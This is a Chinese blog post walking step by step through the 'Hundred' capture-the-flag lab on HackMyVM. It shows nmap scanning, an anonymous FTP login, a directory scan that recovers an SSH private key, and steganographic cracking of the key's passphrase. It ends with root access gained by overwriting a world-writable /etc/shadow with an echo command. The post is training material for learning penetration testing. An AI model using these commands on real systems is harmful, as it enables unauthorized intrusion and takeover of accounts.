美文网首页中间件漏洞收集
网络安全必学渗透测试流程

网络安全必学渗透测试流程

作者: 顶风作案7号 | 来源:发表于2022-02-25 22:02 被阅读0次

这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解渗透测试的流程有很好的帮助。

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Hundred

靶场基本情况:

KALI靶机:192.168.1.3/24

主机:192.168.1.146/24

目标:普通用户flag和管理员flag

信息收集阶段:

nmap -sn 192.168.1.0/2

image.png

sudo nmap -v -T4 -p- -A -oN nmap.log 192.168.1.146

nmap -A 192.168.1.146

image.png

这里我们看到开启了21端口,22端口和80端口:

【一>所有资源获取<一】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

漏洞利用阶段:

我们连接下21端口:

用户名和密码都是ftp,然后查看当前目录文件,可见密钥文件和users.txt文件。

其实用户名是ftp,密码是什么,都可以登录!

image.png

这里采用mget,将所有文件下载到本地!这里采用mget可以一次性下载多个文件!

image.png

id_rsa文件:私钥是个兔子!

image.png

公钥文件,看着挺正常!

image.png

接下来,查看下id_rsa.pem文件!这个像是私钥文件!

image.png

然后,查看用户名文件!最后那个感谢的像是真正的用户名!

image.png

可以这里我们试着用着这个私钥文件通过SSH登录下hmv这个文件!

嘿嘿嘿,不行!

image.png

这条路暂时不同,接着咱们看下那个开放的80端口,直接访问下看看!!!

一个方块?

image.png image.png

貌似出题人,打靶场打的魔怔了!

查看源代码,发现了端倪!

image.png

上面是个文件,下面是个目录!?先下载下来看看

wget http://192.168.1.146/h4ckb1tu5.enc

这个页面作为一个整体告诉我们可以通过这个key值获取一个目录。而且,我们也可以从logo图片获取一些信息通过图片隐写术。回到这个key值,我们可以通过RSA私钥和OpenSSL rsautl解码信息。通过解码信息获取一个文件。

接下来,我们用私钥文件和下载下来不知道啥玩意的文件生成目录!

image.png

访问下看看!192.168.1.146/,方向没错!!!

image.png

查看源代码?啥也没有?

image.png

网站的目录扫描有要点,一层一层的扫描!!!

来个超级字典!

https://github.com/danielmiessler/SecLists/releases/tag/2022.1

扫一波目录:

gobuster dir -w /root/Web-Content/common.txt -u http://192.168.1.146/softyhackb4el7dshelldredd/

image.png

然后,把这个私钥下载下来:

wget http://192.168.1.146/softyhackb4el7dshelldredd/id_rsa

image.png

这次登录试下!两个问题:

  1. too open需要将私钥的权限改为600
  2. 这个id_rsa需要密码
image.png

接下来,需要搞定这个rsa的密码!!!!

我们先把这个logo图片下下来!!!

wget http://192.168.1.146/logo.jpg

这里我们需要安装一个图片隐写工具:

https://github.com/RickdeJager/stegseek/releases/tag/v0.6

下载完:安装下:

dpkg -i stegseek_0.6-1.deb

安装过程中可能缺少部分组件:

apt --fix-broken install

安装完毕:采用先前的user.txt,对logo图片进行解密!

stegseek logo.jpg users.txt -xf output

image.png

这就是私钥的密码了!!

d4t4s3c#1

ssh -i id_rsa hmv@192.168.1.146

image.png

终于进来了!!!!

权限提升阶段:

接下来,root权限提升:

在这台VM上root的权限提升很容易。这个/etc/shadow文件对任何人可写。因为我们可以通过修改这个文件来获取root的密码。

以下链接介绍了/etc/shadow文件的组成:

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

image.png

因为我们不需要读/etc/shadow这个文件,我们只需要复写它。

因此,我们把密码修改为root,如下:

1 生成密码root的加密值

openssl passwd # enter new password "root"

2 将root的加密值导入到/etc/shadow的root用户格式中

echo root:qdbEWfKM1ov2g:18844:0:99999:7::: > /etc/shadow

3 切换为root,输入密码root

su -l


image.png

完事了,这个难度是easy,其实也不简单。

相关文章

  • 网络安全必学渗透测试流程

    这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解...

  • Metasploit基础

    渗透测试流程和类型 渗透测试流程 渗透测试执行标准(PTES:Penetration Testing Execut...

  • 二、渗透测试基本流程

    菜鸟学习笔记,请多多指教! 渗透测试流程 2.1 渗透测试基本流程   渗透测试的基本流程主要分为以下几步:  1...

  • python web渗透测试工具学习1:Web应用渗透测试简介

    Web应用渗透测试简介 Web渗透测试流程 典型的Web应用工具包 测试环境 Web渗透测试流程 在本节中,我们将...

  • python web渗透测试学习1:Web应用渗透测试简介

    Web应用渗透测试简介 Web渗透测试流程 典型的Web应用工具包 测试环境 Web渗透测试流程 在本节中,我们将...

  • 网络安全中开放端口主要分为哪几类?

    网络安全行业中最火热的就是渗透测试领域了,不少初来乍到的年轻人将渗透测试作为自己的入行首选,那在渗透测试中端口扫描...

  • 信息收集

    在渗透测试中一般分为以下几个流程:明确目标、信息收集、渗透测试、后渗透测试、报告文档,虽然各种书籍上对渗透测试的流...

  • 渗透测试流程

    1.明确目标 确定范围 确定规则 确定需求 2.信息搜集 基础信息 系统信息 应用信息 版本信息 服务信息 人员信...

  • 2018-05-23-第一章节

    1.渗透测试的分类: A:黑盒测试 完全模拟攻击者的流程和方法,在对目标站点一无所知的情形下完成渗透测试流程 B:...

  • (2022版)网络安全最系统的自学路线,从基础到进阶

    01 什么是网络安全 网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击...

网友评论

    本文标题:网络安全必学渗透测试流程

    本文链接:https://www.haomeiwen.com/subject/npzxrrtx.html